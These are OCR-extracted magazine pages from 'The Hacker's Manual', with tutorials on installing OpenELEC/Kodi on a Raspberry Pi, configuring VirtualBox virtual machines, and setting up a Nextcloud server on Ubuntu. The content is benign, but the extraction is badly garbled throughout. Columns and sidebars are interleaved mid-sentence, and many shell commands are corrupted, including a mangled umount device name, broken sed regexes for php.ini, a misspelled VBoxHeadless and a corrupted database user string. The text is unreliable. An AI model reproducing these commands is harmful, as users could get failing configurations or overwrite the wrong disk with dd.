CPU and memory usage. There’s not an Replace 192.168.x.y with your chosen
awful lot you can do here - the idea is to IP address and 192.168.x.z with your
give you access to useful tools only. router's IP address (get this using the > If you’d rather configure OpenELEC via a Terminal,
Network settings in OpenELEC are ifconfig). Save your changes and reboot. you’ll find a limited number of commands available.

You can download the latest version from http:// the Remote tab and you'll find a handy point-and-click
openelec.tv/get-openelec where you'll find v6.0.1 as the on-screen remote to use - what isn't so obvious is that your
latest release for both the Raspberry Pi and also generic PC keyboard now controls Kodi too, as if it were plugged into your
hardware. It's not large, the full disc image is around 100MB. Pi directly. You'll also see tabs for movies, TV Shows and
Bydefault,youonly
The files are compressed in TAR or GZ format, so you’ll first music - once you've populated your media libraries you’ll be need a username
need to extract them. The simplest way to do this is using able to browse and set up content to play from here. (’kodi) to connect
your Linux distro’s GUI - in Ubuntu, eg, copy the file to your This approach relies on your PC or laptop being in line of your remote PC or
hard drive, then right-click it and choose 'Extract Here'. sight of your TV - if that's not practical, press your tablet or mobile to control
Kodi - it's probably
phone into service as a remote control instead. Search the
a good idea to
Build, install and configure Google Play store for Kore (Android) or the App Store for Kodi add a password
Now connect your micro SD card to your PC using a suitable Remote (iOS) and you'll find both apps will easily find your Pi too - navigate to
card reader (you can pick one up for under £3 online) and use and let you control it via a remote-like interface. System > Settings
> Services >
the $dmesgltail command or Disks utility to identify its By default. OpenELEC uses DHCP to connect to your local
Web Server to
mountpoint. Once done, type the following commands - network - if your Pi's local IP address changes, it can be hard add a password
which assume your drive is sdc and that your image file is in to track it down in your web browser for remote configuration. and change the
the Downloads folder. Change this by choosing System > OpenELEC > Connections, username.

$ umount /dev/sdcl selecting your connection and hitting Enter. Choose 'Edit'
$ cd Downloads from the list and pick IPv4 to assign a static IP address you’ll
$ sudo dd if=OpenELEC-RPi.arm-6.0.1.img of=/dev/sdc bs=4M be able to use to always access Kodi in future. You can simply
You'll want to use sudo dd if=OpenELEC-RPi2. stick with the currently assigned address, or pick another.
arm-6.0.1.img of=/dev/sdc bs=4M if installing OpenELEC on Make sure you select 'Save' to enable the change. If all of this
the Pi 2/3. Wait while the image is written to your micro SD sounds like too much bother, check out the box on SSH (see
card - this may take a while, and there's no progress bar, so SSH Access above) for a way to change the underlying
be patient (time for a cup of tea, perhaps?). configuration files instead. »
Once complete, unmount your drive and then eject it.
Insert the micro SD card into the Pi, connect it up to monitor
g Videos Files
Set content
and keyboard and switch it on. You should immediately see a
This directory contains Choose a scraper
green light flash, and the screen come on. (Movies) v A S- The Movie Database
The OpenELEC splash screen will appear, at which point
° Local Information only
it'll tell you it's resizing the card - it's basically creating a data
partition on which you can store media locally if you wish.
After a second reboot, you'll eventually find yourself
presented with an initial setup wizard for Kodi itself. The Movie Database
Content scanning options
If you've not got a mouse plugged in, use Tab or the cursor
Movies are in separate folders that match the movie title
keys to navigate between options, and Enter to select them.
Scan recursively
Start by reviewing the hostname - OpenELEC - and
Selected folder contains a single video
changing it if you're going to run a media server and the name
Exclude path from library updates
isn’t obvious enough already. Next, connect to your Wi-Fi
network by selecting it from the list and entering your
passphrase. You can then add support for remote SSH access Settings OK Cancel

as well as Samba (see SSH Access box, above).


You can now control Kodi remotely if you wish via your
web browser: type 192.168.x.y:80 into your browser > Kodi employs the use of scrapers to automatically grab artwork and metadata
(substituting 192.168.x.y with your Pi's IP address). Switch to for your media files based on their filename and folder structure.

The Hacker's Manual | 79


Software

» Set up libraries
The first thing to do is add your media to your library. Kodi
supports a wide range of containers and formats, so you
should have no problem unless you’ve gone for a particularly
obscure format. Check the box (see Add Content to your
Library, below) for advice on naming and organising your
media so that allows Kodi to recognise it and display extra
information about TV shows and movies. This uses the help
of special ‘scrapers’; tools that extract metadata from online
Want to update
databases such as movie titles, TV episode synopses and
OpenELEC to the
latest build? First, artwork to pair them with your media files for identification.
> The Amber skin is a beautiful alternative to the more
downloadthelatest Where should you store this local content for Kodi to get
functional Confluence default. Sadly, there's no access to
update file (in at it? If your micro SD card is large enough - we’d suggest
the OpenELEC configuration menu from it.
TAR format) from
64GB or greater - then you can store a fair amount of video
http://openelec.
tv/get-openelec
and music on there. You can transfer files across the local UK for movies, eg). Click ’OK’ twice and choose ‘Yes' when
and open File network - open File Manager and opt to browse your prompted to update the library.
Manager and click network. Your OpenELEC device should show up - double­ Once done, you'll find a new entry - Library - has been
Browse Network. click the file sharing entry and you’ll see folders for Music. added to the media menu on the main screen. This gives you
Double-click
Pictures, TV Shows and Videos - simply copy your files here access to your content with filters such as genres, title or year
your OpenELEC
device and copy to add them to your library. Once done, browse to Video or to help navigate larger collections. Now repeat for the other
the TAR file into Music and the media files should already be present and types of media you have. If you want to include multiple folder
the Update folder. accounted for, although at this point in time they've not been locations within single libraries, you’ll need to browse to the
Reboot OpenELEC
assigned a scraper to help you identify them yet. Files view, then right-click the library name (or select it and
and you'll find
the update will
It can be slow copying files across in the network - you press c on the keyboard) to bring up a context menu. Select
be appliec. can transfer files directly to the card when it’s mounted in a 'Edit Source’ to add more locations, and ’Change Content’ to
card reader on your PC. but you'll need to access File change the media type and scraper if necessary.
Manager as root to do so - in Ubuntu, eg, typing $ gksudo The smartest thing to do with any digital media library is
nautilus and hitting Enter will give you the access you need. host it on a media server, which allows you to easily access it
A simpler option - if you have a spare USB port on your Pi - from other devices on your network and - in some cases -
is to store your media on an external thumb or hard drive. over the wider internet. Kodi has UPnP media server
Just plug the drive into your Pi. browse to Videos or Music capabilities that work brilliantly with other instances of Kodi
and choose the ’Add...’ option. Click 'Browse' and select the on your network as well as making your media accessible
top-level folder containing the type of media you're adding - from other compatible clients. Media servers can be quite
TV, movies or music. demanding, so we don’t recommend using a Pi Zero or Pi
If you’ve plugged in a USB device, you'll find it under root/ Model B+. Instead, set it up on your most powerful PC (or Pi
media, while NAS drives are typically found under ’Windows 2/3) and use OpenELEC to connect to it as a client.
Network (SMB)'. Once selected, click OK’. The Set Content As media servers go. Kodi's is rather basic. If you want an
dialogue box will pop up - use the up and down arrow attractive, flexible server then see our Emby guide [Features.
buttons to select the type of media you're cataloguing and p32, LXF204]. Pair this with the Emby for Kodi add-on and
verify the selected scraper is the one you want to use. Check you can access your Emby-hosted media without having to
the content scanning options - the defaults should be fine for add it to your Kodi library. A similar add-on exists for users of
most people - and click ‘Settings’ to review advanced Plex Media Server too. PleXBMC (http://bit.ly/PleXBMC),
options (you may want to switch certification country to the providing you with an attractive front-end.

Add content to your library


Kodi works best with your locally stored and Plex- we recommend using the > Name your
digital media, but for it to recognise your following table to help: media files up
TV shows from your music collection you Need to rename files in a hurry? Then correctly if you
need to name your media correctly and Filebot (www.filebot.net) is your new want them to
organise them into the right folders too, best friend. It checks file data against an appear fully

Kodi supports the same naming enormous catalogue and assigns relevant formed in your
convention as its rival services Emby metadata automatically. media library.

1 Type 1 Syntax 1 Example 1


Folder Structure

Music Music\Artist\Album artist - track name Music\David Bowie\Blackstar\david bowie - Iazarus.mp3


Movies Movies\Genre\Movie Title title (year) Movies\Sci-Fi\Star TrekXstar trek (2009).mkv

TV shows TV\Genre\Show TitleXSeason tvshow - sOleOl TV\Sci-Fi\Fringe\Season 5\fringe - s05e09.mkv

Music videos Music VideosXArt ist artist - track name Music Videos\A-ha\a-ha - velvet.mkv

80 | The Hacker's Manual


OpenELEC

If you want access to other UPnP servers via Kodi without One bottleneck for Pi devices is dealing with large libraries
any bells and whistles, then browse to System > Settings > - give it a helping hand by first going to Settings > Music >
Services > UpnP/DLNA and select 'Allow remote control via File lists and disabling tag reading. Also go into Settings >
UPnP'. You can also set up Kodi as a media server from here: Video > Library and disable ‘Download actor thumbnails'. You
select 'Share my libraries' and it should be visible to any UPnP can also disable 'Extract thumbnails and video information'
client on your network, although you may have to reboot. under File Lists.
Performance is going to be an issue on lower-powered The default Confluence skin is pretty nippy, although if you
devices, such as the Pi, and while the Pi 2 and 3 are pretty suffer from stutter when browsing the home screen, consider
responsive out of the box. the Pi Zero may struggle at times. disabling the showing of recently added videos and albums:
It pays, therefore, to try and optimise your settings to give select Settings > Appearance, then click Settings in the right­
your Pi as much resources as it needs to run smoothly. Start hand pane under Skin. Switch to 'Home Window Options' and
by disabling unneeded services - look under both System > de-select both ‘Show recently added...'options.
OpenELEC > Services (Samba isn't needed if you're not Speaking of Confluence, if you don't like the default skin,
sharing files to and from Kodi, eg) and System > Settings > then try Amber - it's beautiful to look at, but easy on system
Services (AirPlay isn't usually required). Incidentally, while resources. You do lose access to the OpenELEC settings when
you're in System > Settings, click 'Settings level: Standard' to it's running, but you can always switch back to Confluence
select first Advanced > Expert to reveal more settings. temporarily or use SSH for tweaks, if necessary. ■

Add catch-up TV to your streaming stick


Add ons 12:06 PM
Install from zip file

u
W Addons OK
M Modules
Caned
* Rcpostories
M Skins
All.ln.One.zip
iStreamjnstaBer zip
1Stream_Repos1tofy.zip
XunityTalk.Repository zip

hfip //www xunitytalk me/xfmity/XunityTaik_RtpositO(y zip

D Add BBC iPlayer D Get ITV Player


Browse to Videos > Add-ons. Select ‘Get more...’, then scroll through Navigate to System > File Manager. Select 'Add Source' followed by
the list and find ‘iPlayer WM'. Select this and choose 'Install'. Once <None>’, enter http://www.xunitytalk.me/xfinity and select Done’
installed you'll be able to access it through Videos > Add-ons for followed by ’OK'. Hit Esc then choose System > Settings > Add-ons >
access to both live and catchup streams. Configure subtitles and Install from ZIP file. Select xfinity from the list of locations, select
other preferences via System > Settings > Add-ons > iPlayer WWW. 'XunityTalk_Repository.zip', hit Enter and wait for it to be installed.

Videos ITV 12:09 PM

A Touch of Frost • 5 episodes


Alexander Armstrong in the Land of the Midnight Sun • 1 episode

Almost Naked Animals -15 episodes


Aviva Premiership Highlights • 3 episodes
Ax Men • 5 episodes
Barging Round Britain with John Sergeant ■ 4 episodes
Bo Beautiful 1 episode
Star Grytls Survival School • 5 episodes
Bemdorm - S episodes
Beowulf Return To The Shieldlands ■ 5 episodes
Big Ang: Miami Monkey • 4 episodes
Beds of a Feather • 4 episodes
Blue Murder - 8 episodes

EJ Finish installation D UKTV Play


Now select ‘Install from repository’ followed by .XunityTalk Follow the instructions for ITV Player to add http://srp.nu as a
Repository > Video add-ons, scroll down and select ITV. Choose source, then add the main repository via SuperRePo > isengard >
Install and it should quickly download, install and enable itself. Go to repositories > superepo. Next, choose Install from repository >
Videos > Add-ons to access live streams of six ITV channels, plus SuperRepo > Add-on repository > SuperRepo Category Video. Finally,
access the past 30 days of programmes through ITV Player - a big add UKTV Play from inside the SuperRepo Category Video repo to
improvement on the standard seven days offered on most platforms. gain access to content from UKTV Play’s free-to-air channels.

The Hacker's Manual | 81


Software

VirtualBox:
Virtualisation
We reveal how virtualisation software can tap into your PC’s unused
processing power to help you run multiple operating systems.
oday's multi-core PCs are built to run multiple tasks your toes in the water) than with the open-source solution.

T simultaneously, and what better way to tap into all


that power than through virtualisation? Virtualisation,

splitting a single physical PC (known as the 'host') into


VirtualBox? VirtualBox may be free, but it's still a powerful
option that offers both a friendly graphical front-end for
and in particular hardware virtualisation, is the process of creating, launching and managing your virtual machines, plus
a raft of command-line tools for those who need them.
multiple virtual PCs (referred to as 'guests'), each capable An older version of VirtualBox is available through the
of working and acting independently of the other. Ubuntu Software Center, but for the purposes of this tutorial
Virtualisation software allows the host to carve up its we're going to focus on the newer version 5.x branch, which
memory, processor, storage and other hardware resources you can obtain from www.virtualbox.org/wiki/Linux_
in order to share individual parcels with one or more guests. Downloads. You'll find that a variety of different builds exist,
If your PC is powerful enough, you can run multiple virtual each one geared towards a specific distro (or distro version).
machines in parallel, enabling you to effectively split your Both 32-bit (i386) ard 64-bit (AMD64) links are provided to
computer in two to perform different tasks without having downloadable and clickable Deb files, or you can follow the
to tie up multiple PCs. instructions provided to add the appropriate VirtualBox
Virtualisation isn't simply a means of dividing up repository to your sources list.
computing power, though. It also enables you to easily Once it's installed, the quickest way to get started is to
run alternative operating systems in a safe, sandboxed launch VirtualBox through the Dash. This opens the Oracle
environment - your guest PC can be isolated [in theory - Ed] VM VirtualBox Manager, which is where all your virtual
from your host, making it safe to experiment with new machines can be listed (and organised into groups). It's also
software or simply try out a different flavour of Linux, for where you create new VMs from scratch, but before you
example. It can also be used for compatibility purposes - you begin, select File > Preferences to change the default
may have switched from Windows, for instance, but want machine folder if you want to store your virtual machine
access to a virtual Windows machine to run old programs settings somewhere other than your own home folder. This
without having to use a dual-boot setup. isn’t a critical step, but as each guest may consume gigabytes
It goes without saying that the faster and more powerful of space for its own needs, you may prefer to choose a
your PC, the better equipped it is to run one or more virtual dedicated drive (or one with lots of free space). If you're
machines. That said, if performance isn't the be-all and end- looking to purchase a drive for your virtual machines, then
all of your virtualisation experiments, then it's perfectly consider an SSD to add zip to your VM's performance.
possible to run a single virtual machine in even relatively
low-powered environments. Create your first VM
With your virtual machine folder set, click 'OK' and then
Choose VirtualBox click the 'New' button to create your first virtual machine.
There are many virtualisation solutions available for Linux, The Create Virtual Machine Wizard works in either of two
but what better way to meet your needs (or even just dip ways, Guided or Expert, with the latter putting the three
configuration steps in a single window. Start by selecting your
To give your VMs a chosen OS and version from the two drop-down menus -
speed boost,enable VirtualBox supports all the major OSes, including BSD, Solaris
VT-x/AMD-V
and IBM OS/2 in adcition to Windows. OS X and - of course -
acceleration. First,
Linux. The Version drop-down changes depending on your
visit http://bit.ly/
lNFLGX2toseeif initial selection: all the major distros as well as Linux kernel
your processor is versions from 2.2 onwards are available.
supported. If it is, It's important to choose the right OS and version because
make sure support
this will ensure that other machine settings are set so they’re
is enabled in your
PC’s BIOS or UEFI compatible. You'll see this immediately when the 'Memory
- check your size’ slider changes to match the OS. This will be set to a
motherboard comfortable minimum setting, so feel free to alter it using the
manual or website
) VirtualBox enables you to set up, manage and run slider - it's colour-coded green, amber and red to help you
for instructions.
multiple guest machines from the comfort of your desktop. set the memory to a level that’s comfortable for your host PC.

82 | The Hacker's Manual


VirtualBox

Headless setup
One way to maximise your host PC's resources is VBoxManage startvm "VM name" --type
to run your virtual machine headless. This means headless
there’s no way of interacting with that VM on the Alternatively, hold Shift as you click the VM
host PC: instead, you access it remotely using in the VirtualBox Manager, and you'll be able to
the Remote Display Protocol (RDP). First, make monitor its progress from the Preview window
sure you have the VirtualBox Extension Pack before switching to your remote computer.
installed - this provides support for VirtualBox's When it comes to accessing your headless VM
implementation of RDP - then enable it on your from another PC, the rdesktopclient is built into
VM via Settings > Display > Remote Display tab most distros, but VirtualBox a\so ships with
by ticking 'Enable Server'. You’ll need to change rdesktop-vrdp. which gives your guest access to
the default port (3389) if you're setting up any USB devices plugged into the PC you're sat
multiple VMs in this way - choose unique ports at. Use the following command:
for each between 5000 and 5050. rdesktop-vrdp -r usb -a 16 -N 192.168.x.y;0000
Once it's configured, you can launch your VM Replace .x.y with your host PC's IP address,
from the Terminal via one of two commands: and OOOO with the port number you allocated > Run your VM headless to cut resource
VBaxHeadless -startvm <uuidlvmname> (3389 by default). usage if you plan to access it remotely.

The figure you set is actual host RAM, not virtual memory, so Other key settings
be sure to leave enough for your PC's other tasks (including Switch to the Display tab to configure your virtual graphics
the running of VirtualBox itself). card. Start by allocating as much memory as you think
The final option is to create a virtual hard disk. This you'll need, and also tick the 'Enable 3D Acceleration' box to Make use of
basically starts out as a single file that represents your guest’s improve performance across all your VMs. If you're running a the VirtualBox
Manager's new
hard drive, and will splinter off only when you start working Windows virtual machine, then tick the 2D option too. Switch
Group feature to
with snapshots {picturedbelow). In most cases, leave 'Create to the Remote Display tab if you'd like to access your VM organise your VMs
a virtual hard disk now' selected and click 'Create', at which remotely. The Video Capture tab makes it possible to record into user-defined
point you'll need to set its size, location (click the little folder your VM screen as a video should you want to do so - the categories: right­
former feature requires the VirtualBox Extension Pack, which click the first VM
button to choose a different location from the default), file
in the list and
type and how the virtual file will behave. For these latter we'll talk about shortly.
choose'Group:
options, the defaults of 'VDI' and 'Dynamically allocated’ The Storage tab is where you can configure the internal Right-click the
usually work best; the latter ensures that the physical f le storage of your virtual PC - by default your virtual hard drive group header and
containing your virtual hard drive's contents starts small and is added to the SATA controller, from where you can add more choose'Rename',
then create new
grows only as it's filled with data. Click 'Create' and you- drives. You'll also see that a single DVD drive is also added to
machines directly
virtual machine is ready and waiting for action. the IDE controller. Select it and click the little disc button next from this group or
to the Optical Drive drop-down to select a physical drive or drag other guests
Virtual hardware tweaking mount an ISO disk image as a virtual drive instead. Tick the into it to assign
them to the group.
It’s tempting to dive straight in and start using your new 'Passthrough' option if you'd like to be able to write discs, play
virtual machine, but while the basic hardware settings are in audio CDs or watch encrypted DVDs.
place, you should take the time to ensure it has all the power The options in the Audio and Serial Ports tabs are largely
and resources it needs to function as you want it to. You can self-explanatory, but if you plan to make your guest VM visible
always tweak these settings later, but the best time to set it over your local network for the purposes of sharing files and
up is before you begin. other resources, then select 'Network' and change the NAT
Select your new virtual machine and click the 'Settings' setting to 'Bridged Adapter'. Other configurations are also
button. Switch to the System tab, where you'll find three tabs: available from here - 'NAT Network', eg, allows you to create a
Motherboard, Processor and Acceleration. You can tweak network of VMs that can see and interact with each other
your VM's base memory from the Motherboard tab, as well while remaining invisible to the host. NAT networks are
as switch chipset. although unless you need PCI Express
support the default PI 1X3 should be fine in most cases.
The Pointing Device is set to 'USB Tablet' by default, but
there s a 'PS/2 Mouse' option for legacy purposes.
The Extended Features section should already be set up
according to the OS you've chosen, but if you’d like your
virtual machine to have a UEFI rather than a BIOS, tick
'Enable EFI’ here. Note, however, that this works only for
Linux and OS X; Windows guests aren't (yet) supported.
If you have a multi-core CPU installed, switch to the
Processor tab to allocate more than a single core to your VM,
making sure you don't attempt to allocate more cores than
your processor physically possesses (Hyperthreading should
be discounted). You may also need to tick 'Enable PAE/'NX’ if
your virtual machine needs access to more than 4GB of RAM
on a host PC with an older 32-bit processor.
The Acceleration tab allows you to tap into the processor's > The ability to take snapshots of your virtual machines makes them
virtualisation features if they exist - see the tip for details. particularly suitable as test beds.

The Hacker's Manual | 83


Software

» configured independently via VirtualBox's File > Preferences physical disc) containing the installer of the OS you wish to
menu (look under Network). emulate, then start the VM and follow the prompts to get
started. Once running, your virtual machine acts in exactly
Working with USB peripherals the same way your main PC does - click inside the main
The USB tab is where you can capture specific USB devices window and your mouse and keyboard may be 'captured' by
for use in your VM. However, before you can use this feature, the VM. allowing you to work inside it. To release these back
you need to make sure you add your username to the to your host PC. press the right-hand Ctrl key.
vboxusers group on your host PC using the following Once you've installed your target OS in the guest machine
command in the Terminal: you'll need to install the Guest Additions - a series of drivers
sudo usermod -a -G vboxusers <username> and applications that enhance the VM's performance. Key
Once this is done, your USB devices will become visible additions include a better video driver supporting a wider
to your VirtualBox guests. Note that VirtualBox supports range of resolutions and hardware acceleration, mouse
only the older USB 1.1 implementation by default, but you pointer integration, which allows you to more easily move the
can install the VirtualBox Extension Pack to add support for mouse between host and VM without it being captured, and
USB 2.0 and USB 3.0 among other extras (including PCI and support for shared folders.
host webcam passthrough). Download this Extension Pack Installing these for Windows guests is as simple as
from www.virtualbox.org. but note the licence restrictions: selecting Devices > Insert Guest Additions CD image... After a
unlike VirtualBox. it’s not open source and is free for ’personal short pause, the setup wizard should appear. Things are a bit
It's possible to evaluation’ only. more complicated for Linux guests - see chapter 4.2.2 under
port your virtual
You can easily connect to USB devices within your guest VirtualBox's Help > Contents menu for distro-by-distro
machines to
different PCs - on the fly - click the USB button on the guest machine guides. Once you've followed the prerequisites, open the file
select File > Export window and select your target peripheral from the list - but manager and browse to the root of the Guest Additions CD.
Appliancetosetup adding specific USB Device Filters here makes it possible to then right-click inside the window and choose 'Open in
an archive in OVF
automatically capture specific devices when the VM boots. Terminal’. Once the Terminal window opens, the following
(OpenVirtualization
Format) format,
One example of where this could be handy is if you set up a command should see the additions installed:
using the OVA VM as a headless TV server - it would allow the VM to take sudo sh ,/VBoxLinuxAdditions.run
extension to control of your USB TV stick the moment it starts. We cover After rebooting you should be able to resize your VM
bundle everything the Shared Folders tab in the 'Share data' box below, while window to the desired resolution simply by clicking and
into a single file. Be
the User Interface tab allows you to specify which menu dragging on it - have the Displays panel open in your guest
warned: it doesn't
include snapshots options are made available to this guest. when you're doing this to verify the dimensions as you resize.
and often changes
thevirtualharddisk Your first boot Take a snapshot
from VDI to
With your VM's hardware set up. you're ready to go. You need Your VM is now set up and ready for action. It should work in
VMDK format.
to point your virtual CD/DVD drive towards an ISO file (or exactly the same way as any physical machine, but it has one

Share data
Getting data to and from your VM is a critical part of achine View Input Devices Help
virtualisation, and VirtualBox makes this as simple as © Optical Drives
possible. The obvious way is to set up a bridged network as lows 10 (Pre-lnfectlc
& Network
described earlier, then create shared folders with which you
f USB
can swap data over your network, but there are other handy
9 Webcams
sharing tools provided too.
I® Shared Folders
The Shared Folders feature works best with guests you
don't want exposed to the wider network, and also allows li Shared Clipboard
you to make folders available from your host without sharing ■5- Drag and Drop

them on the network. Open your VM's settings and go to the / Insert Guest Additions CD image...
Shared Folders tab and you can specify a folder on your host
PC that's made available to your guest: click the plus ('+')
button, select the folder you want to share and change its
display name on your guest if necessary. You can also elect
to make the folder read-only to the guest, have it mount
automatically when the VM starts and. last but not least,
choose Make Permanent’to have the shared folder persist
beyond the current VM session.
Open the Devices menu and you'll find two other ways
of sharing too: Shared Clipboard allows you to share the
contents of the clipboard between host and guest (this can
be limited to one-way sharing, or made bi-directional).
You can also implement Drag-and-Drop. another way to
quickly share files between host and guest by dragging files > Make life (and file-sharing) easy: you can configure VirtualBox to allow you
into and out of the guest machine window. to quickly transfer files to and from your guest using drag-and-drop.

84 | The Hacker's Manual


VirtualBox

crucial advantage: snapshots. Snapshots let you take one-


click backups of your guest at a specific point in time. 'You can ntckfntck-ubuntu:-$ VBoxSOL --startvR 'Debltn ■ Cinnamon*
OracU VM VirtualBox $pi, GUI ver$Un J.®.1®
then proceed secure in the knowledge you can roll back to the (C) 2BO5-2O1S Oracle Corporation
All rights reserved.
* " Debian - Cinnamon - Oracle VM VirtualBox
snapshot and undo all the changes you've made since. 0
GNU GRUB version 2.02~beta2-22
You can create snapshots while your machine is powered
off, or during use - just select Machine > Take Snapshot to Advanced options for Debian GNU/llnux
Henorg test (n-entest86*)
do so. Give your snapshot an identifiable name, and also add wnory test (ireBtestW*. serial console 11S200)
Kenory test (mentest86*. experlaental nultlboot)
Keniyy test (n*-»te$t%‘, serial console 115200, experimental «vitiboot)
a description if you wish, then click ‘OK’.
When you take a snapshot. VirtualBoxstarts recording
changes to the drive in a different file. If you delete a
snapshot, those changes are merged back into the main file,
while if you roll back to an earlier snapshot (or the base use the 1 and 1 keys to select which entry is highlBhted.
Press enter to boot the selected OS, e' to edit th&oora
image), the snapshot's changes are lost unless you create an
additional snapshot when prompted. VMs support multiple debian«
snapshots, and you can even move between them, allowing
you to create multiple setups from within a single gues:.
access to the menu commands offered by the main > Remove all
Terminal use VirtualBox window, but some handy shortcuts you can the desktop
paraphernalia
VirtualBox's user interface may be a convenient way to get employ while pressing the host key (the right Ctrl key by
and run your
started with virtualisation, but once you're up and running default): f toggles full-screen view on and off, while n takes a
guest in a lean,
you'll be pleased to learn there are a number of command­ snapshot. Press h to press the ACPI power button, p to pause
distraction-free
line tools you can employ if that works better for you. You and resume, q to power off or r to reset. Finally, press Del in window using
can even bypass the graphical VirtualBox Manager entirely conjunction with the host key and you'll send a Ctrl+Alt+Del VBoxSDL
if you're willing to learn the rather lengthy list of sub­ to the guest machine. Alternatively, shut down your VM using
commands for the VBoxManage tool, such as createvm and the VBoxManage tool - just type the following command to
startvm, but even if you're happy with the point-and-c ick initiate the ACPI power button, eg:
approach, there are a number of tools you should take a VBoxManage controlvm "VM name" acpipowerbutton
closer look at. Another handy command-line tool is VBoxHeadless, which
The first is VBoxSDL - if you'd like to launch your VM in a enables you to run your virtual machine headless. To do this -
'pure', distraction-free environment (so none of the controls and allow yourself to access it remotely from another
offered by the default VM window), this is the tool for you. Its computer (check out our Headless setup box).
usage is pretty straightforward: Whether you plan to use VirtualBox from the command
VBoxSDL -startvm <vmname> line or its GUI. you'll find it's packed with powerful and useful
Replace <vmname> with the name of your VM (or its features that will convert you to the possibilities and power of
UUID if you prefer). Once it's running, you'll not only have virtualisation. You'll wonder how you ever coped before! ■

Extend the size of your VM drive

D Consolidate snapshots B Resize virtual drive B Extend partition


If your VM contains snapshots, the resizing Close VirtualBox, open Terminal and navigate The drive concerned has been resized, but
process will affect only the original base to the folder containing your VDI file. Now you’ll now need to repartition it. Boot your
image. To resolve this, right-click the VM and type the following command, replacing VM having attached an ISO of the Gparted
choose Settings, then append -old on to the drivename.vdi with the filename of your Live CD and then use that to move partitions
end cf its name. Click 'OK', right-click the VM particular VDI file: around to use the extra space - you may
again, but this time choose Clone. Click VBoxManage modifyhd "drivename.vdi" -resize have to resize the extended partition first,
‘Expert Mode", then rename it and verify that 10000 then move the swap volume to the end
'Full Clone' and ‘Current machine state’ are The resize figure is in MB, so 10000 equals before resizing the partition from the left
selected before clicking 'Clone'. 10,000MB or 10GB. to make the space available.

The Hacker's Manual | 85


Software

Nextcloud:
Share your files
Remote storage silos are a dime a dozen, but be wary of their privacy
policies. We explain how to set up your own and keep control.
nline storage services such as Dropbox offer a command-line wizard to help you setup a password for the

You can install


Nextcloud on
O convenient option for accessing and sharing data
anywhere on the planet. Yet the convenience comes
at a cost, and the very idea of transferring our files to a
remote server, outside of our jurisdiction, seems rather
database server's root user and setup some other defaults to
harden the database installation.
Then comes PHP which you can fetch along with all the
required modules with sudo apt install php libapache2-mod-
Ubuntu Server strange in the post-Snowden era. This is where Nextcloud php php-fpm php-cli php-json php-curl php-imap php-gd
simply with sudo
steps in. It offers all the conveniences of an omnipresent php-mysql php-xml php-zip php-intl php-mcrypt php-imagick
snap install
storage service while keeping you in charge of your private php-mbstring . By default PHP has defined very conservative
nextcloud .This
however robs you data. The open source data sharing server is brimming with limits which will prevent you from uploading large files into
of all the custom features for both home and large-scale enterprise users. With your Nextcloud server The following commands will increase
configuration Nextcloud you can store, sync and share not just your data the PHP memory limit to 512MB, and take the upload and
options available but your contacts and calendars. It also boasts of advanced individual post size to 250MB:
during a manual
features such as single sign-on capability, theming for custom $ sed -i “s/memoryjixnit = .7memory_limit = 512M/” /etc/
install.
branding, custom password policy, secure WebRTC php/7.0/fpm/php,ini
conferencing, Collabora Online Office integration and more. If $ sed -i “s/upload_max_filesize = ,7upload_max_filesize =
that's not enough, in addition to the core functions you also 250M/” /etc/php/7.0/fpm/php.ini
get a host of additional useful add-ons. $ sed -i “s/post_max_size = ,‘/post_max_size = 250M/” /etc/
php/7.0/fpm/php.ini
Paint the sky Lastly, ensure that the PHP module is loaded in Apache
You'll have to lay the foundation before you can install with sudo a2enmod php7.0 before you restart the web server
Nextcloud. We'll setup Nextcloud on top of an Ubuntu Server with sudo systemctl restart apache2 .
> Unlike its 16.10 installation and begin by making sure our installation is Next we'll create a database and a Nextcloud user in
progenitor, there up to date with sudo apt update && sudo apt upgrade . MariaDB. Log into MariaDB database server with the
is only one open We'll then fetch and install the individual components that following command:
source version
make up the popular LAMP stacks. First up is the Apache web $ mysql -u root -p
of Nextcloud and
server which can be installed with sudo apt install apache2 After authenticating with the password you specified while
the developers
apache2-utils . Next up is MariaDB which is a drop-in securing MariaDB, you can create a database named
plans to generate
revenue via
replacement for MySQL. Install it with sudo apt install nextcloud with:
support and mariadb-server mariadb-client. Straight after it's installed, run > create database nextcloud;
consulting MariaDBs post installation security script with sudo mysql_ Similarly, you can create a user for administering this
services. securejnstallation . The script takes you through a small database with:
> create user nextcloudadmin@localhost identified by
‘a-password’;
Remember to replace a-password with your preferred
password. Finally grant this user all the privileges on the
freshly minted Nextcloud database with:
> grant all privileges on nextcloud.* to nextcloudadmin®
localhost identified by ‘a-password’;
Bring the changes into effect and exit the MySQL prompt:
> flush privileges;
> exit;
We’ll also enable the binary log for MariaDB which will
contain a record of all the changes to the database. Open
MariaDB’s configuration file in a text editor with sudo nano /
etc/mysql/mariadb.conf.d/50-server.cnf and enter the
following lines under the [mysqld] section:
log-bin = /var/log/mysql/mariadb-bin

86 | The Hacker's Manual


Nextcloud

Cloud control
In the main tutorial we've looked at Server settings. Server info. Usage report public shares, set a default expiry date for
setting up and using a default Netcloud and more. The Server info option is all public shares, restrict members of
instance. But as the admin you can tinker different from the others in that instead share files only with others users in their
with several settings to acclimatise of helping you tweak any settings it only group, and more. You can configure the
Nextcloud as per your requirements. visualises various details about the Nextcloud server to send out emails for
"o access these settings, roll-down the Nextcloud server such as the load on the various types of notifications and
menu next to your username and select CPU, memory usage, and more. password resets from the Additional
the Admin option. This takes you to a Head to the Sharing section to settings section. This page also lets you
page that lists several settings that affect configure the policy for sharing files on define a password policy by forcing the
the entire Nextcloud installation grouped the server. Here you can toggle options to minimal length, the use of mixed cases,
under various different heads such as force users to set a password on all numeric and special characters.

log-bin-index = /var/log/mysql/mariadb-bin.index
binlog_format = mixed SetEnv HOME /var/www/nextcloud
Save and close the file when you're done. Then reload SetEnv HTTPJHOME /var/www/nextcloud
MariaDB service with sudo systemctl reload mysql.
Similarly, you'll also have to make some tweaks to the </Directory>
Apache web server. Nextcloud needs several modules to
function correctly. Enable them with the a2enmod rewrite Save the file and bring Nextcloud online with:
and a2enmod headers commands. $ sudo In -s /etc/apache2/sites-available/nextcloud.conf /etc/
Also while you can use Nextcloud over plain HTTP, the apache2/sites-enabled/nextcloud.conf
Nextcloud developers strongly encourage the use of SSL/ That's the command-line stuff taken care of. Now fire up a
TLS to encrypt all server traffic, and to protect user's logins web browser on any computer on the network and head to
and data in transit. Apache installed under Ubuntu already https://192.168.3.106/nextcloud Replace 192.168.3.106
comes equipped with a simple self-signed certificate. All you with the IP address or domain name of the server you’ve
have to do is to enable the SSL module and the default site deployed Nextcloud on.
